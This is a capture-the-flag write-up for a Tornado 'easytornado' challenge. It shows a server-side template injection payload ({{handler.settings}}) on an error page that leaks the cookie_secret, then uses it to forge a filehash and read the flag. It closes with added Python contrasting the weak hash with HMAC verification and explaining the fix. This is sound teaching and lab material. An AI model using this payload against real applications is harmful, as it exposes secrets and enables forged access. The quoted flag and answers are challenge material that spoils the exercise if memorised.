easytornado
Challenge description: Tornado framework
Opening the page shows three files: /flag.txt, /welcome.txt and /hints.txt
Opening any of them gives a URL of the form http://220.249.52.133:35276/file?filename=xxx&filehash=xxx
/flag.txt says the flag is in /fllllllllllllag
/hints.txt says the filehash is computed as md5(cookie_secret+md5(filename))
/welcome.txt mentions render, i.e. template rendering, which suggests SSTI
Requesting http://220.249.52.133:35276/file?filename=/fllllllllllllag directly redirects to http://220.249.52.133:35276/error?msg=Error
Trying http://220.249.52.133:35276/error?msg={{7}} echoes 7
Trying http://220.249.52.133:35276/error?msg={{7*7}} returns ORZ, so operators are probably filtered
handler.settings can be used to read the Tornado application settings, which include the cookie_secret
Trying http://220.249.52.133:35276/error?msg={{handler.settings}} reveals cookie_secret: 5286b756-16e4-4eaa-81dc-ea015da3a90f
Then compute the filehash as the hint describes: md5(/fllllllllllllag)=3bf9f6cf685a6dd8defadabfb41a03a1, md5(5286b756-16e4-4eaa-81dc-ea015da3a90f3bf9f6cf685a6dd8defadabfb41a03a1)=e48d9e63c7d18f9743e70cb0ca341a92
Visiting http://220.249.52.133:35276/file?filename=/fllllllllllllag&filehash=e48d9e63c7d18f9743e70cb0ca341a92 returns the flag:
flag{3f39aea39db345769397ae895edb9c70}
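As an added example that is not part of the original writeup, the following Python reimplements the filehash scheme from /hints.txt (md5 of the cookie_secret concatenated with the hex md5 of the filename) next to the shape a server-side check should have: a keyed HMAC recomputed by the server and compared in constant time. The secret below is a constructed placeholder, not the challenge's value, and the function names are this example's own. The point it makes is the one the writeup relies on: the tag protects nothing once the secret is readable, and here the secret became readable because the error page rendered user input as a template with access to handler.settings.

```python
import hashlib
import hmac

# Constructed placeholder for this example; the challenge's real secret is the
# one quoted in the writeup and is deliberately not reused here.
COOKIE_SECRET = "00000000-0000-0000-0000-000000000000"


def challenge_filehash(secret: str, filename: str) -> str:
    """The scheme hints.txt describes: md5(cookie_secret + md5(filename)).

    md5(filename) is taken as its 32-character hex digest and appended as text
    to the secret before the outer md5, matching how the writeup's values are
    chained.
    """
    inner = hashlib.md5(filename.encode()).hexdigest()
    return hashlib.md5((secret + inner).encode()).hexdigest()


def hmac_filehash(secret: str, filename: str) -> str:
    """Keyed alternative: HMAC-SHA256 over the filename with the secret as key.

    This removes ad-hoc hash concatenation, but it is still only as strong as
    the secrecy of the key; it does not help if settings leak into a template.
    """
    return hmac.new(secret.encode(), filename.encode(), hashlib.sha256).hexdigest()


def verify_filehash(secret: str, filename: str, presented: str,
                    scheme=hmac_filehash) -> bool:
    """Server-side check: recompute the tag and compare in constant time so
    that a mismatch is not observable through timing."""
    expected = scheme(secret, filename)
    return hmac.compare_digest(expected, presented)


if __name__ == "__main__":
    # Whoever holds the secret can mint a tag the server accepts for any name,
    # which is exactly why exposing handler.settings broke the challenge.
    name = "/flag.txt"
    tag = challenge_filehash(COOKIE_SECRET, name)
    print("challenge-style filehash:", tag)
    print("accepted for /flag.txt:", verify_filehash(COOKIE_SECRET, name, tag, challenge_filehash))
    print("accepted for /welcome.txt:", verify_filehash(COOKIE_SECRET, "/welcome.txt", tag, challenge_filehash))
```

The real fix for this class of bug is on the rendering side: treat the msg parameter as data passed into a fixed template (autoescaped) rather than as template source, and keep application settings out of anything user-controlled reaches. Rotating the secret after a leak is necessary too, since every previously minted tag remains valid until the key changes.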